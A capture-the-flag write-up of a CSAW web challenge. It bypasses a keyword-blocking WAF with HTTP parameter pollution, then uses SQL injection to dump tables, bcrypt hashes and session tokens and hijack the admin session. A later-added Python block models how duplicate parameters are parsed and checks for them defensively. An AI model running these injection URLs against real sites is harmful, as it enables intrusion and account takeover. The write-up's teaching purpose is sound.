By Danux Mitnick
Last week I was invited to join a team to participate in a CTF (Capture The Flag) contest organized by the CSAW team. With my wife and kids around, I only had the opportunity to pick one challenge, related to Web Exploitation, named "HorceForce" and worth 300 points! Basically, you were provided with a low-privilege account and needed to find your way to get Administrator access. There are multiple resources explaining how to exploit it, but I definitely want to share my experience.

After sending some single quotes it was easy to find a SQL Injection bug by getting the well-known "MySQL SQL Error Message". So, as you all know, the first attempt was something like:

http://128.238.66.217/horse.php?id=7 or 1 IN (select current_user)

And I got an error message saying something like "PLEASE STOP trying to hack this blablablabla site". Then, after trying many techniques to bypass the filter, I realized the WAF was configured to deny any string containing either "select" or "union". Blindly, I assumed the WAF's regular expression was something like:

/^.*select.*$/ or /^.*union.*$/

This means every string containing those words, even ones that make no sense from a SQLi point of view like blablaSELECTblabla, or a bypass technique like /*!union*/, was triggering the warning message.

After some research I found the HTTP Parameter Pollution technique, which basically allows the attacker (among other things) to play with the GET parameters in order to confuse the WAF filter. So, how does it work? Let's say you have the GET parameter "id": you can duplicate it (or even add it many times) and send something like:

?id=value1&id=value2

Depending on the framework used (PHP, Java, ASP.NET, etc.) the parameters are going to be parsed differently. In our case, with Apache/PHP, if you send the same parameter multiple times only the last one will be parsed by the framework (see the table below), but guess what? Only the first parameter is going to be analyzed by the WAF!
This means, by injecting:

?id=7&id=[SQLi]

WAF (network layer) parses id=7 <- Good to go!
PHP (application layer) parses id=[SQLi] <- SQLi successfully injected

So, this is a typical example where you can inject something that is going to be treated differently at the network layer and at the application layer. Below is a table where you can find how other frameworks react when receiving the same parameter multiple times. ASP.NET, for example, concatenates the two parameters when it receives them, and therefore you can split the attack across those fields to bypass the WAF, which is out of scope of this blog.
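To make the parsing difference concrete, here is an added Python example (not part of the original write-up) that parses one query string under the duplicate-parameter policies discussed above: first occurrence (what the WAF in the write-up inspected), last occurrence (PHP's $_GET), concatenation (ASP.NET-style; the comma separator is my assumption) and keep-all. It also shows the check a WAF or application should perform instead: flag duplicated names and run the blacklist over every occurrence of a parameter rather than only the first. The query strings and the "[SQLi]" placeholder value are constructed for the example.

```python
import re
from urllib.parse import parse_qsl

# Constructed example query in the shape used in the write-up; "[SQLi]" is a
# placeholder standing in for whatever the second value would be.
POLLUTED = "id=7&id=[SQLi]"

# The naive blacklist the write-up infers for the WAF: any value containing
# "select" or "union", case-insensitively.
BLACKLIST = re.compile(r"select|union", re.IGNORECASE)


def parse_params(query, policy):
    """Parse a query string into {name: value} under a duplicate-name policy.

    policy:
      'first'  - keep the first occurrence (what the WAF in the write-up inspected)
      'last'   - keep the last occurrence (PHP's $_GET behaviour)
      'concat' - join all occurrences with ',' (ASP.NET-style; separator assumed)
      'all'    - keep every occurrence as a list
    """
    parsed = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        if policy == "first":
            parsed.setdefault(name, value)
        elif policy == "last":
            parsed[name] = value
        elif policy == "concat":
            parsed[name] = value if name not in parsed else parsed[name] + "," + value
        elif policy == "all":
            parsed.setdefault(name, []).append(value)
        else:
            raise ValueError(f"unknown policy: {policy}")
    return parsed


def duplicated_params(query):
    """Names that occur more than once: the signal a WAF should act on."""
    seen = {}
    for name, _ in parse_qsl(query, keep_blank_values=True):
        seen[name] = seen.get(name, 0) + 1
    return sorted(name for name, count in seen.items() if count > 1)


def waf_hits(query, inspect_all=True):
    """Run the blacklist over the request and return the (name, value) hits.

    inspect_all=False reproduces the weak WAF from the write-up (only the first
    occurrence of each name is checked); inspect_all=True checks every
    occurrence, so a value hidden in a duplicate cannot slip past.
    """
    if inspect_all:
        values = [(n, v) for n, vs in parse_params(query, "all").items() for v in vs]
    else:
        values = list(parse_params(query, "first").items())
    return [(n, v) for n, v in values if BLACKLIST.search(v)]


def layers_disagree(query, waf_policy="first", app_policy="last"):
    """True when the WAF and the application would act on different values."""
    return parse_params(query, waf_policy) != parse_params(query, app_policy)


if __name__ == "__main__":
    for policy in ("first", "last", "concat", "all"):
        print(f"{policy:6}: {parse_params(POLLUTED, policy)}")
    print("duplicated names:", duplicated_params(POLLUTED))
    print("WAF and app disagree:", layers_disagree(POLLUTED))
    # The same request shape the write-up used against the first-occurrence WAF.
    smuggled = "id=0&id=7 union select 1,2,3,current_user"
    print("first-only WAF hits:", waf_hits(smuggled, inspect_all=False))
    print("inspect-all WAF hits:", waf_hits(smuggled))
```

Inspecting every occurrence (or rejecting requests that repeat a parameter the application expects once) closes the gap between the two layers; it does not fix the underlying SQL injection, which still needs parameterized queries in the application.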
So, my next try was to inject something like:

128.238.66.217/horse.php?id=0&id=7%20union%20select%201,2,3,current_user

You can notice that all the injection is taking place in the second parameter, which is not being parsed by the WAF, and voila!!! I got my first successful response:

csaw_chal1@localhost

After that, all is simple SQLi to enumerate tables:

128.238.66.217/horse.php?id=0&id=7%20union%20select%20table_name,2,3,4%20from%20information_schema.tables%20limit%201

horses
sessions
users

Then get the fields from the table users:

128.238.66.217/horse.php?id=0&id=7 union select 1,2,3,column_name from information_schema.columns where table_name='users' limit 200

Description: user_id
Description: username
Description: password
Description: name
Description: level

And then dump the username and password, trying to identify the Administrator password:

Description: administrator Pass: $2a$08$kF9H1vqa.fogHc2JwbFNweay.sgdksbiuB9f7MN5mNZgcG6y7BrFG
Description: michael_vick Pass: $2a$08$B2fI59Zzph61LajSSgkoB.i0YJ9HH8wBobmExxqPxl/.0Zu3Tijm2
Description: csaw_challenger Pass: $2a$08$zFI9j/fsHKKbV0UCiavNveEIIi./v8lsqiaKxTV3T3BkrBk4XvSEK
Description: beefsister33 Pass: $2a$08$AUAeUut7FjkdCMfQJUuJwulgnBLbbTc0F/njHbl3mn59IS6OyADbO
Description: nuclear_grandma Pass: $2a$08$edsWdwf45DDC4Vb2VPiikOspNpr3ePS5VE7z3aYsuMEZyodbkHRDK
Description: teabag_swag Pass: $2a$08$uN4sFJ73Quf/b5hC3GxXIO53ewJ0W71c2Vuh4f2x.pr3iTrChvNOK

But unfortunately those passwords were not stored in clear text (they are bcrypt hashes). If you remember, though, there was a table named "sessions", so let's dump its content:

128.238.66.217/horse.php?id=0&id=7%20union%20select%201,2,3,session%20from%20sessions%20limit%20200

Description: bsv30irdq0PCvJxJrCAxROcmdXaUiwgQtPeg5J75EYgrH8jyHQ
Description: hbpnEGKo2WeLvQuQL0kb8vyyOHMn96ZYAROXmBggB6Pdr0FX4p
Description: VnRu2Zcv7REYTgHOqafggyYn3hA3cq1D9B4u4IxEcnB0TgPT4j
Description: UkOAVJ4ZAuX1t0Hib4maJccftZVeC4TdCZ8WxhQJZKqQ9axbwc
Description: 4gNszBZeSDjjKE5sSJwIcPOzTvhM90IR9JrqPa286tLfiDNDyp
Description: hmmJU3LrcIO7yJ77aSOsL9YIEjKITkOLg1CE0HF6Cnsbv2J077
Description: SL2v2sJvyu7Xw5Lc5b8UBSNFGOFhMfFrCWsgNGZZBSBfazpTlX

Then you just go to your browser, use an add-on like "Cookies Manager" for Firefox, change your current session value to one of the ones found above and..... we got the Admin session:

bsv30irdq0PCvJxJrCAxROcmdXaUiwgQtPeg5J75EYgrH8jyHQ

Which gives us the precious key: